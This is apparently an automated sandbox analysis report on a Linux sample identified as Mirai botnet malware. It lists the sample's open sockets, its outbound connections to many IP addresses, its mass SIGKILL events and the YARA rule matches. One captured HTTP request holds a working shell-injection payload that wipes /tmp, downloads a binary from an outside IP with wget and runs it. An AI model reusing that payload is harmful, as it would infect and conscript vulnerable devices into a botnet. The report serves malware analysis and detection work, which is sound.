      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8088
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8083
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::443
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::4444
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8001
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::49152
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::40960
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::1024
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::1337
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::420
      Source: /lib/systemd/systemd-journald (PID: 5325)Socket: <unknown socket type>:unknown
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 59.56.176.218
      Source: unknownTCP traffic detected without corresponding DNS query: 171.8.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 125.203.73.149
      Source: unknownTCP traffic detected without corresponding DNS query: 93.124.75.115
      Source: unknownTCP traffic detected without corresponding DNS query: 45.28.151.44
      Source: unknownTCP traffic detected without corresponding DNS query: 168.122.77.69
      Source: unknownTCP traffic detected without corresponding DNS query: 111.231.133.154
      Source: unknownTCP traffic detected without corresponding DNS query: 42.72.218.69
      Source: unknownTCP traffic detected without corresponding DNS query: 124.111.175.215
      Source: unknownTCP traffic detected without corresponding DNS query: 107.197.27.28
      Source: unknownTCP traffic detected without corresponding DNS query: 116.96.54.65
      Source: unknownTCP traffic detected without corresponding DNS query: 118.121.103.45
      Source: unknownTCP traffic detected without corresponding DNS query: 24.197.74.37
      Source: unknownTCP traffic detected without corresponding DNS query: 163.145.193.9
      Source: unknownTCP traffic detected without corresponding DNS query: 134.155.92.44
      Source: unknownTCP traffic detected without corresponding DNS query: 183.237.208.127
      Source: unknownTCP traffic detected without corresponding DNS query: 195.22.149.59
      Source: unknownTCP traffic detected without corresponding DNS query: 220.171.237.96
      Source: unknownTCP traffic detected without corresponding DNS query: 137.130.224.50
      Source: unknownTCP traffic detected without corresponding DNS query: 141.248.156.246
      Source: unknownTCP traffic detected without corresponding DNS query: 219.139.170.176
      Source: unknownTCP traffic detected without corresponding DNS query: 209.161.166.222
      Source: unknownTCP traffic detected without corresponding DNS query: 43.62.31.90
      Source: unknownTCP traffic detected without corresponding DNS query: 12.78.157.250
      Source: unknownTCP traffic detected without corresponding DNS query: 59.174.231.21
      Source: unknownTCP traffic detected without corresponding DNS query: 36.255.173.8
      Source: unknownTCP traffic detected without corresponding DNS query: 154.185.192.181
      Source: unknownTCP traffic detected without corresponding DNS query: 223.48.19.162
      Source: unknownTCP traffic detected without corresponding DNS query: 148.44.194.235
      Source: unknownTCP traffic detected without corresponding DNS query: 105.70.94.103
      Source: unknownTCP traffic detected without corresponding DNS query: 2.152.239.194
      Source: unknownTCP traffic detected without corresponding DNS query: 82.28.36.35
      Source: unknownTCP traffic detected without corresponding DNS query: 101.157.180.96
      Source: unknownTCP traffic detected without corresponding DNS query: 216.43.59.137
      Source: unknownTCP traffic detected without corresponding DNS query: 190.57.223.135
      Source: unknownTCP traffic detected without corresponding DNS query: 72.216.180.22
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.6.37
      Source: unknownTCP traffic detected without corresponding DNS query: 51.126.45.5
      Source: unknownTCP traffic detected without corresponding DNS query: 158.14.135.163
      Source: unknownTCP traffic detected without corresponding DNS query: 35.136.38.83
      Source: unknownTCP traffic detected without corresponding DNS query: 139.106.192.0
      Source: unknownTCP traffic detected without corresponding DNS query: 119.31.153.65
      Source: unknownTCP traffic detected without corresponding DNS query: 87.203.165.240
      Source: unknownTCP traffic detected without corresponding DNS query: 12.3.226.82
      Source: unknownTCP traffic detected without corresponding DNS query: 112.190.123.116
      Source: unknownTCP traffic detected without corresponding DNS query: 152.86.147.139
      Source: unknownTCP traffic detected without corresponding DNS query: 95.92.170.188
      Source: unknownTCP traffic detected without corresponding DNS query: 111.8.223.182
      Source: unknownTCP traffic detected without corresponding DNS query: 171.34.91.29
      Source: unknownTCP traffic detected without corresponding DNS query: 113.140.3.145
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Jan 21 2017Content-Type: text/html; charset=UTF-8Content-length: 213
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Sample tries to kill multiple processes (SIGKILL)Show sources
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 936, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5275, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 658, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 720, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 759, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 761, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 772, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 797, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1320, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1334, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1335, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1389, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1809, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1872, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1983, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 2048, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 4331, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5025, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5218, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5219, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5271, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5279, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5280, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5309, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5321, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5322, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5323, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5325, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5326, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5337, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5340, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5399, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5401, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5402, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5403, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5404, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5407, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5465, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5466, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5469, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5491, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5495, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5496, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5501, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5502, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5523, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5527, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5538, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5561, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5592, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5595, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5598, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5599, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5600, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5601, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5602, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5603, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5604, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5605, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5606, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5607, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5608, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5609, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5610, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5611, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5612, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5613, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5614, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 936, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 491, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 658, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 720, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 721, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 759, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 761, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 772, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 774, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 777, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 785, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 793, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 797, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1320, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1334, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1335, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1344, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1389, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1476, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1601, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1809, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1860, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1872, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1886, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1983, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 2038, result: successful
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5275.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
